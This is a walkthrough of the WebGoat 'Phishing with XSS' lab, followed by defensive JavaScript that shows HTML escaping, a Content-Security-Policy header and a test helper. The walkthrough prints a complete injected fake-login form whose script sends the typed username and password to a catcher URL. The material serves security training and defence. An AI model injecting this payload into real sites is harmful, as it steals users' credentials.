XSS - Phishing with XSS


Use the XSS vulnerability to perform a phishing attack


In the search function, we insert a script that creates a form for the phishing attack. The user input is redirected to "http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName".

Step-by-step guide

1. Create an XSS script with an HTML user/pass form. The attack script consists of two parts: a form with user/pass input fields, and a script (shown in red in the original) that reads the input from the form and sends it to the defined catcher, in our case the WebGoat catcher.



<script>
// Reads the form fields and sends them to the WebGoat catcher as an image request
function hack(){
  XSSImage=new Image;
  XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
  alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<H2>This feature requires account login:</H2>
Enter Username:<input type="text" name="user"><br>
Enter Password: <input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>

2. Enter the above script into the search field.

3. The phishing account login form now appears below the search field.

4. If the user enters a username/password, a confirmation window pops up.
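
From the defender's side, the steps above work because the search page echoes the search term into its HTML without encoding it. The following is an added example, not part of the original walkthrough or WebGoat's code: a hypothetical results renderer (all function names are assumptions) shown in its vulnerable and encoded forms, run against a constructed sample term shaped like the form from step 1.

```javascript
// Added example: hypothetical search-results renderer, not WebGoat's code.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can open a tag or break out of an attribute.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the search term is echoed into the page unchanged,
// so any markup in it becomes live elements.
function renderResultsUnsafe(term) {
  return `<p>Results for: ${term}</p>`;
}

// Hardened pattern: the term is HTML-encoded and displays as text.
function renderResultsSafe(term) {
  return `<p>Results for: ${escapeHtml(term)}</p>`;
}

// Defence in depth: without 'unsafe-inline', script-src blocks inline <script>
// blocks and inline handlers such as onclick if an encoding step is missed.
function hardenedHeaders() {
  return { "Content-Security-Policy": "default-src 'self'; script-src 'self'; form-action 'self'" };
}

// Review/test helper: count live <script>, <form> and <input> tags in output.
function countActiveTags(html) {
  return (html.match(/<(script|form|input)\b/gi) || []).length;
}

// Constructed sample input, shaped like the form from step 1 (script body omitted).
const sampleTerm =
  '<script>function hack(){}</script><form name="phish">' +
  '<input type="password" name="pass"></form>';

console.log("unsafe:", countActiveTags(renderResultsUnsafe(sampleTerm)), "live tags");
console.log("safe:  ", countActiveTags(renderResultsSafe(sampleTerm)), "live tags");
console.log(renderResultsSafe(sampleTerm));
```

With encoding in place, the login form from step 3 no longer appears; the submitted markup is shown as literal text in the results line.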
